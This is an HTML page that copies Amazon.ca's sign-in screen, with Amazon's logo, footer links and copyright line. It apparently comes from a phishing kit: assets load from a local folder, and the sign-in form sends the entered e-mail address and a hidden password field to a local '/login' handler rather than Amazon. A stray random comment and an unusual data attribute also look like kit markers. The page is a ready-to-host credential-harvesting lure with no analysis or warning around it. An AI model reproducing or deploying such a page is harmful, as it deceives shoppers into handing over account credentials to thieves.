<!DOCTYPE html>
<html class="a-transition a-transform a-opacity a-border-image a-border-radius a-box-shadow a-text-stroke a-text-shadow a-touch-scrolling a-transform3d a-gradients a-local-storage a-textarea-placeholder a-input-placeholder a-autofocus a-webworker a-history a-geolocation a-drag-drop a-svg a-canvas a-video a-audio a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition" data-19ax5a9jf="dingo" data-aui-build-date="3.18.5-2018-04-12"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!-- 101q7qctaqqyzkirud -->
    <title dir="ltr">Amazon Sign In</title>

    
      

      
        <link rel="stylesheet" href="static/61Brdu0o6LL.css">
<link rel="stylesheet" href="static/01SdjaY0ZsL.css">
<link rel="stylesheet" href="static/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e.css">
</head>

  <body class="ap-locale-en_CA a-m-us a-aui_149818-c a-aui_152852-c a-aui_157141-c a-aui_158613-c a-aui_160684-c a-aui_57326-c a-aui_72554-c a-aui_accessibility_49860-c a-aui_attr_validations_1_51371-c a-aui_bolt_62845-c a-aui_perf_130093-c a-aui_tnr_140932-c a-aui_ux_113788-c a-aui_ux_114039-c a-aui_ux_138741-c a-aui_ux_145937-c a-aui_ux_60000-c a-meter-animate">    <img style="display:none;visibility:hidden;" src="static/A2EUQ1WTGCTBG2143-2431243-0743135BFBYXQ6DMMFKGTZ0N40Vuedatas.gif" alt="" onload="window.ue_sbl &amp;&amp; window.ue_sbl();" width="1" height="1">


<div id="a-page">
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        





<div class="a-section a-spacing-medium a-text-center">
  
    

    
      


<a class="a-link-nav-icon" tabindex="-1" href="https://www.amazon.ca/ref=ap_frn_logo">
  
  <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

  
  
    
    
      <i class="a-icon a-icon-domain-ca a-icon-domain" role="img"></i>
    
  
</a>

    
  
</div>


      </div>

      <div id="authportal-center-section" class="a-section">
        
          
          
            <div id="authportal-main-section" class="a-section">
              





<div class="a-section a-spacing-base auth-pagelet-container">
  
    
    
      <div id="auth-cookie-warning-message" class="a-box a-alert a-alert-warning"><div class="a-box-inner a-alert-container"><h4 class="a-alert-heading">Please Enable Cookies to Continue</h4><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
        <p>
          <a class="a-link-normal" href="https://www.amazon.ca/gp/help/customer/display.html/ref=ap_cookie_error_help?">
            
          </a>
        </p>
      </div></div></div>
    
  
</div>

<div class="a-section auth-pagelet-container">
  













<!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->


<!-- Set cross domain sso variables to be used for making Ajax calls to central Identity domain -->


<!-- show a warning modal dialog when the third party account is connected with Amazon -->



  
    





<div class="a-section a-spacing-base">
  <div class="a-section">
    
    <form name="signIn" method="post" novalidate="" action="/login" class="auth-validate-form auth-real-time-validation a-spacing-none fwcim-form" data-fwcim-id="ed96ab52">
      <input name="appActionToken" value="dTt4MDyhGMSCnGWMCdiFz7B9WR8j3D" type="hidden"><input name="appAction" value="SIGNIN_PWD_COLLECT" type="hidden">

      





  
    <input name="openid.pape.max_auth_age" value="ape:MA==" type="hidden">
  
    <input name="openid.return_to" value="ape:aHR0cHM6Ly93d3cuYW1hem9uLmNhLz9fZW5jb2Rpbmc9VVRGOCZyZWZfPW5hdl95YV9zaWduaW4=" type="hidden">
  
    <input name="prevRID" value="ape:QkZCWVhRNkRNTUZLR1RaME40MFY=" type="hidden">
  
    <input name="openid.identity" value="ape:aHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvYXV0aC8yLjAvaWRlbnRpZmllcl9zZWxlY3Q=" type="hidden">
  
    <input name="openid.assoc_handle" value="ape:Y2FmbGV4" type="hidden">
  
    <input name="openid.mode" value="ape:Y2hlY2tpZF9zZXR1cA==" type="hidden">
  
    <input name="openid.ns.pape" value="ape:aHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvZXh0ZW5zaW9ucy9wYXBlLzEuMA==" type="hidden">
  
    <input name="prepopulatedLoginId" type="hidden">
  
    <input name="failedSignInCount" value="ape:MA==" type="hidden">
  
    <input name="openid.claimed_id" value="ape:aHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvYXV0aC8yLjAvaWRlbnRpZmllcl9zZWxlY3Q=" type="hidden">
  
    <input name="pageId" value="ape:Y2FmbGV4" type="hidden">
  
    <input name="openid.ns" value="ape:aHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvYXV0aC8yLjA=" type="hidden">
  



      <div class="a-section">
        <div class="a-box"><div class="a-box-inner a-padding-extra-large">
          <h1 class="a-spacing-small">
            Sign in
          </h1>
          <!-- optional subheading element -->
          
          <div class="a-row a-spacing-base">
            <label for="ap_email" class="a-form-label">
              E-mail address or mobile phone number
            </label>
            
            
              
                
              
              
            
            <input maxlength="128" id="ap_email" name="email" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field" type="email">

            
            <input id="ap-credential-autofill-hint" name="password" class="a-input-text hide" type="password">
            



<div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
  Enter your e-mail address or mobile phone number
</div></div></div>

          </div>

          
          <input name="create" value="0" type="hidden">

          <div class="a-section">
            
            









            
            <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" aria-labelledby="continue-announce" type="submit" onclick="redirect();"><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Continue
            </span></span></span>

            

          </div>

          

          

          



<div class="a-section">
  <div aria-live="polite" class="a-row a-expander-container a-expander-inline-container">
    <a href="javascript:void(0)" data-action="a-expander-toggle" class="a-expander-header a-declarative a-expander-inline-header a-link-expander" data-a-expander-toggle="{&quot;allowLinkDefault&quot;:true, &quot;expand_prompt&quot;:&quot;&quot;, &quot;collapse_prompt&quot;:&quot;&quot;}"><i class="a-icon a-icon-expand"></i><span class="a-expander-prompt">
      Need help?

    </span></a>
    
      <div aria-expanded="false" class="a-expander-content a-expander-inline-content a-expander-inner" style="display:none">
        



  
  
  
    
  

<a id="auth-fpp-link-bottom" class="a-link-normal" href="https://www.amazon.ca/ap/forgotpassword?openid.pape.max_auth_age=0&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=caflex&amp;openid.return_to=https%3A%2F%2Fwww.amazon.ca%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&amp;prevRID=BFBYXQ6DMMFKGTZ0N40V&amp;openid.assoc_handle=caflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0">
  Forgot Password
</a>
      </div>
    
    <div aria-expanded="false" class="a-expander-content a-expander-inline-content a-expander-inner" style="display:none">
      <a id="ap-other-signin-issues-link" class="a-link-normal" href="https://www.amazon.ca/gp/help/customer/account-issues/ref=ap_login_with_otp_claim_collection?ie=UTF8">
        Other issues with sign-in
      </a>
    </div>
  </div>
</div>


          




  
  
  
    
      
      
      
        
        
      
    
  


          
          
        </div></div>
      </div>
    </form>
  </div>
  
    
    
      
        
        <div class="a-divider a-divider-break"><h5>New to Amazon?</h5></div>
        <span id="auth-create-account-link" class="a-button a-button-span12"><span class="a-button-inner"><a id="createAccountSubmit" tabindex="6" href="https://www.amazon.ca/ap/register?openid.pape.max_auth_age=0&amp;openid.return_to=https%3A%2F%2Fwww.amazon.ca%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&amp;prevRID=BFBYXQ6DMMFKGTZ0N40V&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.assoc_handle=caflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;prepopulatedLoginId=&amp;failedSignInCount=0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=caflex&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0" class="a-button-text" role="button">
          Create your Amazon account
        </a></span></span>
      
    
  
</div>

  
  

</div>
            </div>
          
        
      </div>

      
      <div id="right-2">
      </div>

      <div class="a-section a-spacing-top-extra-large auth-footer">
        



<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
  <span class="auth-footer-seperator"></span>

  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.ca/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&amp;nodeId=918816">
      Conditions of Use
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.ca/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&amp;nodeId=918814">
      Privacy Notice
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.ca/help">
      Help
    </a>
    <span class="auth-footer-seperator"></span>
  

  
</div>




<div class="a-section a-spacing-none a-text-center">
  





<span class="a-size-mini a-color-secondary">
  © 2008-2018, Amazon.com, Inc. or its affiliates
</span>

</div>

      </div>
    </div>

    </div>

    






    
    <!-- cache slot rendered -->
    
  </div><div id="be" style="display:none;visibility:hidden;"><form name="ue_backdetect" action="get"><input name="ue_back" value="2" type="hidden"></form>



</div>



<div class="fwcim-container"></div><div id="a-popover-root" style="z-index:-1;position:absolute;"></div></body></html>
